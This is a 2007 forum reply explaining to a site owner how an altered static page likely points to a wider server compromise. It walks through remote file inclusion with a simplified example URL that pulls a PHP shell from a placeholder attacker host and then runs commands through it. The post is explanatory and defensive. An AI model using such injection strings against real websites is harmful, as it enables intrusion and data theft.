WeirdCode - 12:05 pm on Mar 14, 2007 (gmt 0)

selomelo:

Thank you for your comments. In fact, the affected page is a static html file. It contains no php script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting the my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.

Maybe I should explain this a little more extensively. We had a similar problem on our server. It was abused for file sharing though. We had a CMS running, which had a remote file inclusion vulnerability. (Mind you, this is only one example among many many other possibilities). I'll simplify it a little.

The CMS would call a subroutine:

http://www.my-server.com/include=my_subroutine

The input of "my_subroutine" was not sanitized - a flaw in the software. All the attacker had to do was:

http://www.my-server.com/include=http://bad-guy.com/malicious_code.php

"malicious_code" would be, for example, a shell script. This script was stored on my server, and then this guy could call

http://www.my-server.com/malicious_code.php?command=[many nasty things]

So they installed their own server management software by means of a flawed piece of software, and from that moment on they could manipulate the system. Including static html pages like those on your site. In other words, the weak point is NOT the HTML file you are looking at. The problem is somewhere else. Someone gained and most likely still has access to your system, and they are able to do with your files whatever they want. And if they are really really clever they will do it without any obvious sign.

Do you have sensitive information in a mysql database, like credit card info of your customers? These PHP shell scripts may have a mysql access too. Add a weak mysql passwort to this, and they are already selling your confidential info to interested third parties.

Your machine is compromised. You can't trust it any longer.

You may want to google for expressions like "root kit", "r57 shell", "remote file inclusion", then you will get an idea of what happened to your server. The altered html file is but the tip of the iceberg. By means of an additional kernel vulnerability they may have even gained root access. This would mean that they can show you whatever they want, while they are doing something else.

A compromised server in the hands of an unknown attacker is the cyberspace equivalent to a loaded gun in the hands of whoverer in a busy mall. Once they have gained access to your system, and they did, they can do ANYTHING. Including sending death threats to the president, if they wish. You'd have a hard time saying "But it wasn't me, it was someone else." It's your system, you are responsible.

Let's assume you're buying something at ebay or amazon, your credit card info is stolen from their hacked server, and your accounts are billed to like crazy. Imagine you complain (Hey, I've only bought this book at $10, not the holiday home at $2.000.000), and they would say: "Oh, we are so sorry, but we are not liable. You see, it was someone else."

I'm sure you get the picture.

BTW the intrusion did not necessarily originate from your own account on that server. If it's virtual hosting, maybe a different web site was hacked, and by means of privilege escalation they are working their way through all accounts on that server now. Maybe you should talk to your provider. If your site is on a dedicated server, and if you are the owner, you should reset it immediately.